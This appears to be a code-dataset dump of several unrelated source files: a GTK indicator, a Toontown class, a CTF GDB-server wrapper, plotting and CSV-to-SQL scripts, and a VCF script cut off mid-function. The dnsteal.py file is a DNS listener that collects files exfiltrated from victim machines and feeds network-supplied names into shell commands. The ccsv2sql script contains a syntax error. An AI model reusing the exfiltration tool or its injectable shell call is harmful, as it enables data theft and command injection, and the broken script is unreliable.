repo_name
stringlengths 6
61
| path
stringlengths 4
230
| copies
stringlengths 1
3
| size
stringlengths 4
6
| text
stringlengths 1.01k
850k
| license
stringclasses 15
values | hash
int64 -9,220,477,234,079,998,000
9,219,060,020B
| line_mean
float64 11.6
96.6
| line_max
int64 32
939
| alpha_frac
float64 0.26
0.9
| autogenerated
bool 1
class | ratio
float64 1.62
6.1
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
bx5974/desktop-mirror | ubuntu-edge-indicator.py | 2 | 1976 | #!/usr/bin/python
from gi.repository import Gtk, GObject
from gi.repository import AppIndicator3 as appindicator
import urllib, re, os, time, datetime
def openit(*args):
os.system("xdg-open http://www.indiegogo.com/projects/ubuntu-edge")
# both UTC
STARTTIME = datetime.datetime(2013, 7, 22, 15, 0, 0)
ENDTIME = datetime.datetime(2013, 8, 22, 7, 0, 0)
def update(*args):
# screen scraping of glory
fp = urllib.urlopen('http://www.indiegogo.com/projects/ubuntu-edge')
data = fp.read()
mtch = [x for x in data.split('\n') if '$2,' in x and 'amount' in x and 'medium' in x]
if len(mtch) != 1:
ind.set_label("?????", "$32.00m")
return True
val = re.search("\$([0-9,]+)<", mtch[0])
val = val.groups()[0]
val = val.replace(",", "")
val = int(val)
mval = val / 1000000.0
ind.set_label("$%0.2fm" % mval, "$32.0m")
lst.get_child().set_text("Last updated: %s" % time.strftime("%H:%M"))
now = datetime.datetime.utcnow()
done = now - STARTTIME
togo = ENDTIME - now
done_seconds = (done.days * 24 * 60 * 60) + done.seconds
togo_seconds = (togo.days * 24 * 60 * 60) + togo.seconds
ratio = float(togo_seconds) / done_seconds
projected = val + (ratio * val)
mprojected = projected / 1000000.0
prj.get_child().set_text("Projected: $%0.2fm" % mprojected)
return True
if __name__ == "__main__":
ind = appindicator.Indicator.new("ubuntu-edge-indicator", "",
appindicator.IndicatorCategory.APPLICATION_STATUS)
ind.set_status(appindicator.IndicatorStatus.ACTIVE)
ind.set_label("$$$$$", "$32.0m")
menu = Gtk.Menu()
opn = Gtk.MenuItem("Open IndieGogo")
menu.append(opn)
lst = Gtk.MenuItem("Last updated: ?????")
menu.append(lst)
prj = Gtk.MenuItem("Projected: ?????")
menu.append(prj)
menu.show_all()
opn.connect("activate", openit)
ind.set_menu(menu)
GObject.timeout_add_seconds(300, update)
update()
Gtk.main()
| apache-2.0 | 5,578,420,800,267,353,000 | 32.491525 | 90 | 0.616903 | false | 3.00761 | false | false | false |
DedMemez/ODS-August-2017 | building/DistributedToonHouseInterior.py | 1 | 1531 | # Fuck you Disyer. Stealing my fucking paypal. GET FUCKED: toontown.building.DistributedToonHouseInterior
from direct.distributed.DistributedObject import DistributedObject
from toontown.building.HouseInterior import HouseInterior
from toontown.toon.DistributedNPCToonBase import DistributedNPCToonBase
from ZoneBuilding import ZoneBuilding
class DistributedToonHouseInterior(DistributedObject, HouseInterior, ZoneBuilding):
def __init__(self, cr):
DistributedObject.__init__(self, cr)
HouseInterior.__init__(self)
self.ownerId = -1
self.director = None
self.posIndices = []
return
def getBlock(self):
return self.block
def announceGenerate(self):
DistributedObject.announceGenerate(self)
self.setup()
self.setPosIndices(self.posIndices)
def disable(self):
HouseInterior.disable(self)
DistributedObject.disable(self)
def getInteriorObject(self):
return self
def setPosIndices(self, posIndices):
self.posIndices = posIndices
if not self.interior:
return
for i, posHpr in enumerate(self.posIndices):
origin = self.interior.find('**/npc_origin_%s' % i)
if origin.isEmpty():
origin = self.interior.attachNewNode('npc_origin_%s' % i)
origin.setPosHpr(*posHpr)
for npcToon in self.cr.doFindAllInstances(DistributedNPCToonBase):
npcToon.initToonState() | apache-2.0 | 5,008,071,412,437,827,000 | 33.651163 | 105 | 0.664272 | false | 3.966321 | false | false | false |
nemanjan00/dnsteal | dnsteal.py | 1 | 2754 | #!/usr/bin/env python
#####################
import socket
import sys
import binascii
import time
import random
import hashlib
import zlib
import os
class DNSQuery:
def __init__(self, data):
self.data = data
self.data_text = ''
tipo = (ord(data[2]) >> 3) & 15 # Opcode bits
if tipo == 0: # Standard query
ini=12
lon=ord(data[ini])
while lon != 0:
self.data_text += data[ini+1:ini+lon+1]+'.'
ini += lon+1
lon=ord(data[ini])
def request(self, ip):
packet=''
if self.data_text:
packet+=self.data[:2] + "\x81\x80"
packet+=self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00' # Questions and Answers Counts
packet+=self.data[12:] # Original Domain Name Question
packet+='\xc0\x0c' # Pointer to domain name
packet+='\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04' # Response type, ttl and resource data length -> 4 bytes
packet+=str.join('',map(lambda x: chr(int(x)), ip.split('.'))) # 4bytes of IP
return packet
def banner():
print "\033[1;31m",
print """
___ _ _ ___ _ _
| \| \| / __| |_ ___ __ _| |
| |) | .` \__ \ _/ -_) _` | |
|___/|_|\_|___/\__\___\__,_|_|
-- https://github.com/nemanjan00/dnsteal.git --\033[0m
Stealthy file extraction via DNS requests
"""
if __name__ == '__main__':
try:
ip = sys.argv[1]
ipr = sys.argv[2]
ipr = socket.gethostbyname(ipr)
except:
banner()
print "Usage: %s [listen_address] [return_ip]"
exit(1)
banner()
udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp.bind((ip,53))
print '\033[1;32m[+]\033[0m DNS listening on %s:53' % ip
print "\033[1;32m[+]\033[0m Now on the victim machine, use the following command:"
while 1:
try:
data, addr = udp.recvfrom(1024)
p=DNSQuery(data)
udp.sendto(p.request(ipr), addr)
print 'Request: %s -> %s' % (p.data_text, ipr)
filename = ""
data = p.data_text
data = data.replace("/", "")
data = data.replace("\\", "")
data = data.split(".")
for index,item in enumerate(data):
if(index < len(data) - 3):
if(index == 1):
filename = item
if(index > 1):
filename += "." + item
os.popen("mkdir -p data")
filename = "data/"+filename
if(data[0] != "gunzip"):
f = open(filename, "a")
f.write(binascii.unhexlify(data[0]))
f.close()
else:
os.popen("mv " + filename + " " + filename + ".ori ; cat " + filename + ".ori | gunzip > " + filename)
except Exception:
pass
| gpl-2.0 | -8,039,776,869,524,454,000 | 24.036364 | 125 | 0.503268 | false | 3.158257 | false | false | false |
ubergrape/django-abo | abo/urls.py | 1 | 1114 | from django.conf.urls import patterns, url, include
from abo.utils import import_backend_modules
backend_specific_urls = []
for backend_name, urls in import_backend_modules('urls').items():
simple_name = backend_name.split('.')[-1]
backend_specific_urls.append(url(r'^%s/' % simple_name, include(urls)))
from .views import (
CancelView,
ChangeCardView,
ChangePlanView,
HistoryView,
SubscribeView,
SubscriptionSuccessView,
SubscriptionFailureView
)
urlpatterns = patterns('',
url(r"^subscribe/$", SubscribeView.as_view(), name="abo-subscribe"),
url(r"^subscription/(?P<pk>\d+)/success/$", SubscriptionSuccessView.as_view(), name="abo-success"),
url(r"^subscription/(?P<pk>\d+)/failure/$", SubscriptionFailureView.as_view(), name="abo-failure"),
url(r"^change/card/$", ChangeCardView.as_view(), name="abo-change_card"),
url(r"^change/plan/$", ChangePlanView.as_view(), name="abo-change_plan"),
url(r"^cancel/$", CancelView.as_view(), name="abo-cancel"),
url(r"^history/$", HistoryView.as_view(), name="abo-history"),
*backend_specific_urls
)
| bsd-3-clause | 8,146,168,260,789,196,000 | 34.935484 | 103 | 0.680431 | false | 3.448916 | false | false | false |
google/google-ctf | 2018/finals/pwn-gdb-as-a-service/web_challenge/challenge/gdbproc.py | 1 | 10484 | #!/usr/bin/env python3
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import struct
import os
import threading
import re
import functools
import codecs
import psutil
import asyncio
import asyncio.subprocess
def re_findall(q, s):
idx = 0
while True:
match = re.search(q, s[idx:])
if not match:
break
yield idx+match.start()
idx += match.start()+1
def string_findall(q, s):
idx = 0
while True:
idx = s.find(q, idx)
if idx < 0:
break
yield idx
idx = idx+1
class GDBInterrupt(object):
def __init__(self):
pass
class GDBCommand(object):
def __init__(self, data, reply_queue = None):
self.data = data
self._reply_queue = reply_queue
def will_continue(self):
return self._reply_queue == None
async def reply(self, pkt):
if self._reply_queue:
await self._reply_queue.put(pkt)
class GDBError(object):
def __init__(self, msg):
self.msg = msg
class GDBReply(object):
def __init__(self, data):
self.data = data
def is_stop_reply(self):
return self.data.startswith(b'T')
class ExitMsg(object):
def __init__(self):
pass
def gdb_checksum(cmd):
checksum = functools.reduce(lambda csum, c: (csum+c)%256, cmd, 0)
return '{:02x}'.format(checksum).encode('ascii')
def gdb_encode(s):
out = b''
for c in s:
if c in b'#$}':
out += b'}'+bytes([c ^ 0x20])
else:
out += bytes([c])
return out
def gdb_decode(s):
out = b''
i = 0
while i < len(s):
c = s[i]
if c == ord('*'):
cnt = s[i+1] - 29
out += bytes([out[-1]]*cnt)
i += 2
elif c == ord('}'):
c = s[i+1]
c = bytes([c ^ 0x20])
out += c
i += 2
else:
out += bytes([c])
i += 1
return out
def gdb_format_cmd(s):
return b'$' + s + b'#' + gdb_checksum(s)
def gdb_make_pkt(data):
return gdb_format_cmd(gdb_encode(data))
async def message_broker(pkt_queue, reply_queue, stop_reply_queue, gdbserver_stdin):
stopped = True
while True:
pkt = await pkt_queue.get()
if isinstance(pkt, GDBCommand):
if not stopped:
await pkt.reply(GDBError('not stopped'))
continue
gdbserver_stdin.write(gdb_make_pkt(pkt.data))
if pkt.will_continue():
stopped = False
continue
reply = await reply_queue.get()
await pkt.reply(reply)
elif isinstance(pkt, GDBInterrupt):
if stopped:
continue
gdbserver_stdin.write(b'\x03')
elif isinstance(pkt, ExitMsg):
return
else:
assert isinstance(pkt, GDBReply)
assert pkt.is_stop_reply()
assert not stopped
stopped = True
await stop_reply_queue.put(pkt)
async def packet_reader(pkt_queue, reply_queue, gdbserver_stdout):
while True:
next_char = await gdbserver_stdout.read(1)
if not next_char:
return
if next_char == b'+':
# ignore acks
continue
if next_char != b'$':
raise Exception('unexpected character (want $, got {!r})'.format(next_char))
pkt = b''
pkt += (await gdbserver_stdout.readuntil(b'#'))[:-1]
checksum = await gdbserver_stdout.read(2)
if not checksum == gdb_checksum(pkt):
raise Exception('wrong checksum {} vs {}, "{}"'.format(checksum, gdb_checksum(pkt), pkt))
reply = GDBReply(gdb_decode(pkt))
if reply.is_stop_reply():
await pkt_queue.put(reply)
else:
await reply_queue.put(reply)
class GDBProcess(object):
@staticmethod
async def create(argv, stop_reply_queue, env={}, log_fn=None):
self = GDBProcess()
self._bp_mutex = threading.Lock()
self._breakpoints = {}
self._log_fn = log_fn
self._p = await asyncio.create_subprocess_exec('gdbserver', '--once', '-', *argv, stdin=asyncio.subprocess.PIPE, stdout=asyncio.subprocess.PIPE, preexec_fn=os.setsid, env=env, close_fds=True, bufsize=0)
self._pkt_queue = asyncio.Queue()
reply_queue = asyncio.Queue()
loop = asyncio.get_event_loop()
self._msg_broker = loop.create_task(message_broker(self._pkt_queue, reply_queue, stop_reply_queue, self._p.stdin))
self._pkt_reader = loop.create_task(packet_reader(self._pkt_queue, reply_queue, self._p.stdout))
self._proc_dir_fd = None
await self._start_no_ack()
return self
def breakpoints(self):
return list(self._breakpoints.keys())
def _log(self, msg):
if self._log_fn:
self._log_fn(msg)
async def release(self):
self._log('killing gdb process')
self._msg_broker.cancel()
self._pkt_reader.cancel()
os.killpg(os.getpgid(self._p.pid), 9)
await self._p.wait()
self._log('killed gdb process')
def open_proc_file(self, filename, mode='r'):
if not self._proc_dir_fd:
child_processes = psutil.Process(self._p.pid).children()
assert len(child_processes) == 1
child_pid = child_processes[0].pid
self._proc_dir_fd = os.open('/proc/{}/'.format(child_pid), os.O_PATH)
return open('/proc/self/fd/{}/{}'.format(self._proc_dir_fd, filename), mode)
def maps(self):
mappings = []
with self.open_proc_file('maps', 'r') as fd:
for line in fd.read().splitlines():
start,end,perm,name = re.match('^([0-9a-f]+)-([0-9a-f]+)\s+([rwx-]{3})p\s+[0-9a-f]+\s+[0-9a-f]{2}:[0-9a-f]{2}\s+[0-9a-f]+\s+(.*)$', line).groups()
start = int(start, 16)
end = int(end, 16)
size = end - start
mappings.append((start, size, perm, name))
return mappings
def search(self, q, qtype, max_match_count = 64):
mappings = self.maps()
matches = []
with self.open_proc_file('mem', 'rb') as mem_fd:
for start, size, perm, _ in mappings:
try:
mem_fd.seek(start)
except ValueError:
continue
except OverflowError:
self._log('overflow error')
continue
try:
data = mem_fd.read(size)
except IOError:
continue
try:
if qtype == 'regex':
search_fn = re_findall
else:
search_fn = string_findall
if qtype != 'string':
if qtype == 'char':
format_char = 'B'
elif qtype == 'short':
format_char = 'H'
elif qtype == 'int':
format_char = 'I'
else:
# long
format_char = 'Q'
q = struct.pack(format_char, int(q, 0))
for idx in search_fn(q, data):
match = data[idx:idx+max(32, len(q))]
matches.append([start+idx, match])
if len(matches) > max_match_count:
break
except ValueError:
continue
return matches
async def _write_pkt(self, cmd):
self._log('_write_pkt("{}")'.format(cmd))
reply_queue = asyncio.Queue(maxsize=1)
await self._pkt_queue.put(GDBCommand(cmd, reply_queue))
pkt = await reply_queue.get()
if isinstance(pkt, GDBError):
raise Exception(pkt.msg)
assert isinstance(pkt, GDBReply)
return pkt.data
async def _start_no_ack(self):
resp = await self._write_pkt(b'QStartNoAckMode')
if resp != b'OK':
raise Exception('NoAck response: "{}"'.format(resp))
self._p.stdin.write(b'+')
async def set_breakpoint(self, addr):
with self._bp_mutex:
if addr in self._breakpoints:
return
self._log('setting breakpoint at 0x{:x}'.format(addr))
hardware_breakpoint = len(self._breakpoints) < 4
command = 'Z1' if hardware_breakpoint else 'Z0'
resp = await self._write_pkt('{},{:x},1'.format(command, addr).encode('ascii'))
if resp != b'OK':
raise Exception('Breakpoint error: "{}"'.format(resp))
self._breakpoints[addr] = hardware_breakpoint
async def remove_breakpoint(self, addr):
with self._bp_mutex:
hardware_breakpoint = self._breakpoints[addr]
command = 'z1' if hardware_breakpoint else 'z0'
resp = await self._write_pkt('{},{:x},1'.format(command, addr).encode('ascii'))
if resp != b'OK':
raise Exception('Breakpoint error: "{}"'.format(resp))
del self._breakpoints[addr]
def _cont(self, mode):
self._pkt_queue.put_nowait(GDBCommand(b'vCont;'+mode))
def cont(self):
self._cont(b'c')
def step(self):
self._cont(b's')
def interrupt(self):
self._log('interrupting with 0x03')
self._pkt_queue.put_nowait(GDBInterrupt())
_REG_NAMES = ["rax", "rbx", "rcx", "rdx", "rsi", "rdi", "rbp", "rsp", "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15", "rip", "eflags", "cs", "ss", "ds", "es", "fs", "gs"]
async def get_reg(self, name):
return (await self.get_regs())[name]
async def get_regs(self):
resp = await self._write_pkt(b'g')
data = codecs.decode(resp, 'hex_codec')
regs = {}
for i in range(len(GDBProcess._REG_NAMES)):
regs[GDBProcess._REG_NAMES[i]] = struct.unpack('Q', data[i*8:(i+1)*8])[0]
return regs
def read_mem(self, addr, count):
data = b''
with self.open_proc_file('mem', 'rb') as mem_fd:
try:
mem_fd.seek(addr)
data = mem_fd.read(count)
except:
try:
mem_fd.seek(addr)
for i in range(count):
data += mem_fd.read(1)
except:
pass
return data
async def main():
def log(msg):
print('[*] {}'.format(msg))
stop_queue = asyncio.Queue()
import time
print('creating process')
p = await GDBProcess.create(['/bin/sleep', '5'], stop_queue, log_fn=log)
print('process created')
await p.set_breakpoint(0x7ffff7dda886)
print('breakpoint at 0x7ffff7dda886')
p.cont()
await stop_queue.get()
for i in range(10):
p.step()
await stop_queue.get()
print(hex((await p.get_regs())['rip']))
p.cont()
await asyncio.sleep(0.1)
p.interrupt()
await stop_queue.get()
print(hex((await p.get_regs())['rip']))
await p.release()
if __name__ == "__main__":
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
loop.close()
| apache-2.0 | 7,243,329,813,426,914,000 | 27.961326 | 206 | 0.596433 | false | 3.297892 | false | false | false |
pymir3/pymir3 | scripts/plot/plot-feature-track.py | 1 | 1955 |
import argparse
import matplotlib.pyplot as plt
import numpy
import mir3.data.feature_track as feature_track
def plot(input_filename, output_filename, scale=None, dim=0, size=(3.45,2.0)):
"""Plots the a spectrogram to an output file
"""
s = feature_track.FeatureTrack().load(input_filename)
if s.data.ndim > 1:
d = s.data[:,dim]
else:
d = s.data
min_y = numpy.min(d)
max_y = numpy.max(d)
min_time = 0
max_time = float(len(d)) / s.metadata.sampling_configuration.ofs
ylabel = s.metadata.feature.split()[dim]
if scale is not None:
ylabel += ' ('
ylabel += str(scale)
ylabel += ')'
x_axis = numpy.array(range(len(d))) / \
float(s.metadata.sampling_configuration.ofs)
im = plt.plot(x_axis, d)
plt.xlabel('Time (s)')
plt.ylabel(ylabel)
fig = plt.gcf()
width_inches = size[0]#/80.0
height_inches = size[1]#/80.0
fig.set_size_inches( (width_inches, height_inches) )
plt.savefig(output_filename, bbox_inches='tight')
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Plot a spectrogram')
parser.add_argument('infile', type=argparse.FileType('rb'),\
help="""Input spectrogram file""")
parser.add_argument('outfile',\
help="""Output figure file""")
parser.add_argument('--dim', type=int, default=0, help="""Dimension to
plot (used in multidimensional feature tracks)""")
parser.add_argument('--scale', default=None, help="""Scale to use in y-axis
label""")
parser.add_argument('--width', type=int, default=3.45, help="""Output width\
(inches).\
Default: 3.45 (one column)""")
parser.add_argument('--height', type=int, default=2.0, help="""Output\
height (inches).\
Default: 2.0""")
args = parser.parse_args()
plot(args.infile, args.outfile, args.scale, args.dim, \
(args.width, args.height))
| mit | -158,284,182,649,695,260 | 29.546875 | 80 | 0.611765 | false | 3.347603 | false | false | false |
stpettersens/ccsv2sql | ccsv2sql.jy.py | 1 | 4115 | #!/usr/bin/env jython
"""
ccsv2sql
Utility to convert a CSV file to a SQL dump.
Copyright 2015 Sam Saint-Pettersen.
Licensed under the MIT/X11 License.
Tweaked for Jython.
"""
import sys
import csv
import os
import re
import datetime
import getopt
signature = 'ccsv2sql 1.0.6 [Jython] (https://github.com/stpettersens/ccsv2sql)'
def displayVersion():
print('\n' + signature)
def displayInfo():
print(__doc__)
def ccsv2sql(file, out, separator, db, comments, verbose, version, info):
if len(sys.argv) == 1:
displayInfo()
sys.exit(0)
if file == None and out == None:
if verbose == False and version == True and info == False:
displayVersion()
elif verbose == False and version == False and info == True:
displayInfo()
sys.exit(0)
if out == None: out = re.sub('.csv', '.sql', file)
if file.endswith('.csv') == False:
print('Input file is not a CSV file.')
sys.exit(1)
if out.endswith('.sql') == False:
print('Output file is not a SQL file.')
sys.exit(1)
basename = os.path.basename(out)
table = re.sub('.sql', '', basename)
if separator == None: separator = ','
if comments == None: comments = True
fields = []
rows = []
csvfile = open(file, 'r')
f = csv.reader(csvfile, delimiter=separator)
headers = True
for row in f:
if headers:
fields = separator.join(row).split(separator)
headers = False
else:
rows.append(row)
csvfile.close()
dtable = 'DROP TABLE IF EXISTS `%s`;' % table
ctable = 'CREATE TABLE IF NOT EXISTS `%s` (\n' % table
insert = 'INSERT INTO `%s` VALUES (\n' % table
inserts = []
x = 0
for value in rows[0]:
key = fields[x]
fvalue = re.sub('\'|\"', '', value)
tvalue = re.sub('\.', '', fvalue)
if value.startswith('ObjectId('):
ctable += '`%s` VARCHAR(24),\n' % key
elif tvalue.isdigit() == False:
pattern = re.compile('\d{4}\-\d{2}\-\d{2}')
if pattern.match(value):
ctable += '`%s` TIMESTAMP,\n' % key
pattern = re.compile('true|false', re.IGNORECASE)
if pattern.match(value):
ctable += '`%s` BOOLEAN,\n' % key
else:
length = 50
if key == 'description': length = 100
ctable += '`%s` VARCHAR(%d),\n' % (key, length)
else: ctable += '`%s` NUMERIC(15, 2),\n' % key
x = x + 1
x = 0
for row in rows:
ii = ''
for value in rows[x]:
fvalue = re.sub('ObjectId|\(|\)|\'|\"', '', value)
tvalue = re.sub('\.', '', value)
if tvalue.isdigit() == False:
pattern = re.compile('\d{4}\-\d{2}\-\d{2}')
if pattern.match(value):
fvalue = re.sub('\T', ' ', fvalue)
fvalue = re.sub('\.\d{3}Z', '', fvalue)
fvalue = re.sub('\.\d{3}\+\d{4}', '', fvalue)
pattern = re.compile('true|false|null', re.IGNORECASE)
if pattern.match(value):
ii += '%s,\n' % fvalue.upper()
continue
ii += '\'%s\',\n' % fvalue
else: ii += '%s,\n' % fvalue
ii = ii[:-2]
inserts.append(insert + ii + ');\n\n')
ii = ''
x = x + 1
ctable = ctable[:-2]
ctable += ');'
if verbose:
print('\nGenerating SQL dump file: \'%s\' from\nCSV file: \'%s\'\n'
% (out, file))
f = open(out, 'w')
f.write('-- !\n')
if comments:
f.write('-- SQL table dump from CSV file: %s (%s -> %s)\n'
% table, file, out))
f.write('-- Generated by: %s\n' % signature)
f.write('-- Generated at: %s\n\n' % datetime.datetime.now())
if db != None: f.write('USE `%s`;\n' % db)
f.write('%s\n' % dtable)
f.write('%s\n\n' % ctable)
for insert in inserts:
f.write(insert)
f.close()
# Handle any command line arguments.
try:
opts, args = getopt.getopt(sys.argv[1:], "f:o:s:d:nlvi")
except:
print('Invalid option or argument.')
displayInfo()
sys.exit(2)
file = None
out = None
separator = None
db = None
comments = None
verbose = False
version = False
info = False
for o, a in opts:
if o == '-f':
file = a
elif o == '-o':
out = a
elif o == '-s':
separator = a
elif o == '-d':
db = a
elif o == 'n':
comments = False
elif o == '-l':
verbose = True
elif o == '-v':
version = True
elif o == '-i':
info = True
else:
assert False, 'unhandled option'
ccsv2sql(file, out, separator, db, comments, verbose, version, info)
| mit | 1,921,077,044,573,538,000 | 20.102564 | 80 | 0.588092 | false | 2.712591 | false | false | false |
TomJKono/Misc_Utils | VCF_from_FASTA_2.py | 1 | 11371 | #!/usr/bin/env python
"""Updated version of VCF_from_FASTA.py that hopefully will simplify the
process of generating a VCF from Sanger reads aligned to a reference sequence.
Requires Biopython. Assumes the reference sequence is the first one in the
alignment. Takes one argument:
1) FASTA multiple sequence alignment"""
import sys
import re
from datetime import date
try:
from Bio import SeqIO
fa_in = sys.argv[1]
except ImportError:
sys.stderr.write('This script requires Biopython.\n')
sys.exit(1)
except IndexError:
sys.stderr.write(__doc__ + '\n')
sys.exit(2)
def extract_ref_coords(alignment, ref_idx=0):
"""Extract the name and the coordinates from the reference sequence of the
alignment. This expects the sequence to be named in SAM/BED region
format."""
ref = alignment[ref_idx]
chrom = ref.name.split(':')[0]
start = ref.name.split(':')[1].split('-')[0]
return (chrom, start)
def check_ref_gaps(alignment, ref_idx=0):
"""Check the reference sequence for end gaps. If we find any end gaps on
the left, we will throw an error because we cannot accurately calculate the
positions relative to reference. If we find them on the right, we will
throw a warning, but continue anyway."""
ref = alignment[ref_idx]
refseq = str(ref.seq)
left_gap = re.compile(r'^-+[ACGTMRWSYKVHDBNacgtmrwsykvhdbn]')
right_gap = re.compile(r'[ACGTMRWSYKVHDBNacgtmrwsykvhdbn]-+$')
if left_gap.match(refseq):
sys.stderr.write(
"""Error:
Reference sequence has end-gaps on the left. This will cause calculated
positions to be incorrect. Please remove the end gaps and re-run this script.
""")
sys.exit(10)
if right_gap.search(refseq):
sys.stderr.write(
"""Warning:
reference sequence has end-gaps on the right. This is not an error, but some of
the variants at the end of the alignment will not be placed on the reference
sequence. You may either remove the right end-gap or remove the variants from
the resulting VCF that occur in the end-gap.\n""")
return
def check_columns(alignment, ref_idx=0):
"""Check all of the columns of the alignment for those that are all gaps
or all N. Print a list of indices if it finds any."""
no_data = []
raw_aln = [list(s.seq) for s in alignment]
# Transpose it
t_aln = zip(*raw_aln)
refpos = 0
for index, column in enumerate(t_aln):
ref_base = column[ref_idx]
# Calculate the states that are present in this column
states = {s.upper() for s in column}
# Throw out gaps and Ns
states.discard('-')
states.discard('N')
# If there are no states left, then we append it to the list
if not states:
no_data.append((refpos+1, index+1))
if ref_base != '-':
refpos += 1
# Now, if no_data has values in it, then we will print them out here
if no_data:
message = """The following positions (1-based) were found to be either all gaps
or all N in your alignment:
{refpos}
in the reference sequence, or
{alnpos}
in the aligned sequences.\n""".format(
refpos=', '.join([str(i[0]) for i in no_data]),
alnpos=', '.join([str(i[1]) for i in no_data]))
sys.stderr.write(message)
sys.exit(2)
return
def extract_variants(alignment, ref_idx=0):
"""Extract the positions of SNPs and indels in the Sanger reads aligned to
the reference sequence."""
snp_pos = []
indel_pos = []
# First, convert the alignment to a list of lists, as opposed to a list
# of SeqRecord objects
raw_aln = [list(s.seq) for s in alignment]
# Transpose it so that we iterate over columns of the alignment
t_raw_aln = zip(*raw_aln)
# Start iterating across columns and saving positions of variant sites. We
# keep track of the reference base and only increment the position counter
# for when we see a non-gap character in the reference sequence.
offset = 0
for aln_pos, aln_column in enumerate(t_raw_aln):
# First, get the states that exist at this position. Transform them
# all to uppercase characters.
upper_col = [s.upper() for s in aln_column]
states = set(upper_col)
# Discard any 'N' bases
states.discard('N')
# And get the ref state
ref_state = aln_column[ref_idx]
# Use the ref state to get the alternate states
alt_states = states - set(ref_state)
# If there is a gap in this position, then we will append it to the
# list of indel positions
if '-' in states:
indel_pos.append((offset, aln_pos, ref_state, alt_states))
# Then, discard the gap character to look for SNPs
states.discard('-')
# If the length of the states is greater than 1, then we have a SNP
if len(states) > 1:
# We will calculate the following:
# Number of non-missing alleles
# Minor allele count
# Minor allele frequency
# The reference IS included in these calculations.
non_missing = [
base
for base
in aln_column
if base != '-'
or base != 'N']
acs = [aln_column.count(x) for x in states]
afs = [float(c)/len(non_missing) for c in acs]
# Re-discard the gap character, just to be sure we do not count it
# as an alternate state
alt_states.discard('-')
snp_pos.append(
(offset, ref_state, alt_states, len(non_missing), min(acs),
min(afs)))
# If the reference sequence is not a gap, then we increment our offset
# counter.
if ref_state != '-':
offset += 1
return (snp_pos, indel_pos)
def collapse_indels(indels):
"""Collapse indels by identifying runs of consecutive integers and merging
those into a single entry."""
# Sort the indel bases by their aligned position
indel_srt = sorted(indels, key=lambda x: x[1])
# Make a list to hold our aggregated indels
agg_indel = []
# We will now iterate over adjacent records - if they are consecutive, then
# merge them. Else, break it and start a new record.
curr_indel = []
for ind, ind_adj in zip(indel_srt, indel_srt[1:]):
# Unpack the alleles. It's a little silly, but we have to cast the set
# to a list to subset it.
curr_ref = ind[2]
curr_alt = list(ind[3])[0]
adj_ref = ind_adj[2]
adj_alt = list(ind_adj[3])[0]
if not curr_indel:
curr_indel = [ind[0], ind[1], curr_ref, curr_alt]
# If the next position is not consecutive, append it and start over
if ind_adj[0] - ind[0] > 1:
agg_indel.append(curr_indel)
curr_indel = [ind_adj[0], ind_adj[1], adj_ref, adj_alt]
else:
curr_indel[2] += adj_ref
curr_indel[3] += adj_alt
# The way we are iterating through the indel list means that we will always
# leave off the last one. Append it after the loop finishes.
agg_indel.append(curr_indel)
return agg_indel
def adjust_indels(indels, alignment, ref_idx=0):
"""Adjust the indel positions so that they are offset by one, as required
by the VCF spec. This is because the reported position must be the base
*before* any insertion/deletion polymorphism is observed."""
spec_indels = []
# Remove the gaps from the reference sequnce for getting the reference base
# of the indel
ref_seq = ''.join([base for base in alignment[ref_idx].seq if base != '-'])
for i in indels:
spec_pos = i[0] - 1
spec_ref = ref_seq[spec_pos]
spec_indel = [spec_pos, spec_ref + i[2], spec_ref + i[3]]
spec_indels.append(spec_indel)
return spec_indels
def print_vcf(snp_var, ind_var, refseq, offset):
"""Print a VCF from the calculated positions of the variants."""
# Define the VCF header
today = date.today().strftime('%Y%m%d')
vcf_header = """##fileformat=VCFv4.1
##fileDate={filedate}
##source=VCF_from_FASTA_2.py;Morrell Lab @ UMN
##INFO=<ID=MAC,Number=1,Type=Integer,Description="Minor allele count">
##INFO=<ID=MAF,Number=1,Type=Float,Description="Minor allele frequency">
##INFO=<ID=NS,Number=1,Type=Integer,Description="Number of samples with data">
##INFO=<ID=SNP,Number=0,Type=Flag,Description="Variant is a SNP">
##INFO=<ID=INDEL,Number=0,Type=Flag,Description="Variant is an INDEL">
#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO""".format(filedate=today)
print(vcf_header)
# Sort the SNPs and indels by their offset and print the records
srt_variants = sorted(snp_var + ind_var, key=lambda x: x[0])
for v in srt_variants:
# Set the chromosome and position: add 1 to account for 1-based nature
# of VCF
v_chr = refseq
v_pos = str(int(offset) + v[0] + 1)
v_id = '.'
v_qual = '40'
v_filter = '.'
# This is a bit of a hack, but if we have more than three fields, then
# the variant type is a SNP
if len(v) > 3:
# We also have to replace gap characters with N for the reference
# allele in the cases where a SNP occurs in a gapped part of the
# reference.
v_ref = v[1].replace('-', 'N')
# A bit ugly, but we have to cast the alt alleles from set to list
v_alt = ','.join(list(v[2]))
v_info = ';'.join([
'MAC=' + str(v[4]),
'MAF=' + str(v[5]),
'NS=' + str(v[3]),
'SNP'])
else:
# Replace the gap characters with N
v_ref = v[1].replace('-', 'N')
v_alt = v[2].replace('-', 'N')
v_info = 'INDEL'
# Print the line
print('\t'.join([
v_chr,
v_pos,
v_id,
v_ref,
v_alt,
v_qual,
v_filter,
v_info]))
return
def main(fasta):
"""Main function."""
# Store the alignment object as a list
aln = list(SeqIO.parse(fasta, 'fasta'))
# Extract the chromosome name and start position from the name of the
# reference sequence.
chrom, start = extract_ref_coords(aln)
# We should check the reference sequence, too. If there are end-gaps on the
# reference sequence, then we can't accurately calculate positions in the
# alignment.
check_ref_gaps(aln)
# Also check for aligned positions that are all N or all gaps
check_columns(aln)
snps, indels = extract_variants(aln)
# Next, we want to collapse indels. We can find these by identifying runs
